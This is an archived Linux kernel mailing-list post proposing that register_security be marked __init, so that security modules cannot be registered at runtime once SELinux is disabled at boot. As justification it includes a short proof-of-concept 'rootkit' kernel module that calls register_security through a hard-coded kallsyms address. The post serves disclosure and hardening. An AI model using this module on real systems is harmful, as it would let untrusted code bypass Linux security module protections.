[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20100226144955.GB2778@localhost.localdomain>
Date: Fri, 26 Feb 2010 22:49:55 +0800
From: wzt.wzt@...il.com
To: linux-kernel@...r.kernel.org
Cc: linux-security-module@...r.kernel.org, sds@...ho.nsa.gov,
jmorris@...ei.org
Subject: [PATCH] Security: Add __init to register_security to disable load a security module on runtime
LSM framework doesn't allow to load a security module on runtime, it must be loaded on boot time.
but in security/security.c:
int register_security(struct security_operations *ops)
{
...
if (security_ops != &default_security_ops)
return -EAGAIN;
...
}
if security_ops == &default_security_ops, it can access to register a security module. If selinux is enabled,
other security modules can't register, but if selinux is disabled on boot time, the security_ops was set to
default_security_ops, LSM allows other kernel modules to use register_security() to register a not trust
security module. For example:
disable selinux on boot time(selinux=0).
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/init.h>
#include <linux/version.h>
#include <linux/string.h>
#include <linux/list.h>
#include <linux/security.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("wzt");
extern int register_security(struct security_operations *ops);
int (*new_register_security)(struct security_operations *ops);
int rootkit_bprm_check_security(struct linux_binprm *bprm)
{
return 0;
}
struct security_operations rootkit_ops = {
.bprm_check_security = rootkit_bprm_check_security,
};
static int rootkit_init(void)
{
printk("Load LSM rootkit module.\n");
/* cat /proc/kallsyms | grep register_security */
new_register_security = 0xc0756689;
if (new_register_security(&rootkit_ops)) {
printk("Can't register rootkit module.\n");
return 0;
}
printk("Register rootkit module ok.\n");
return 0;
}
static void rootkit_exit(void)
{
printk("Unload LSM rootkit module.\n");
}
module_init(rootkit_init);
module_exit(rootkit_exit);
Signed-off-by: Zhitong Wang <zhitong.wangzt@...baba-inc.com>
---
security/security.c | 2 +-
1 files changed, 1 insertions(+), 1 deletions(-)
diff --git a/security/security.c b/security/security.c
index 122b748..7da630a 100644
--- a/security/security.c
+++ b/security/security.c
@@ -110,7 +110,7 @@ int __init security_module_enable(struct security_operations *ops)
* If there is already a security module registered with the kernel,
* an error will be returned. Otherwise %0 is returned on success.
*/
-int register_security(struct security_operations *ops)
+int __init register_security(struct security_operations *ops)
{
if (verify(ops)) {
printk(KERN_DEBUG "%s could not verify "
--
1.6.5.3
--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@...r.kernel.org
More majordomo info at http://vger.kernel.org/majordomo-info.html
Please read the FAQ at http://www.tux.org/lkml/
Powered by blists - more mailing lists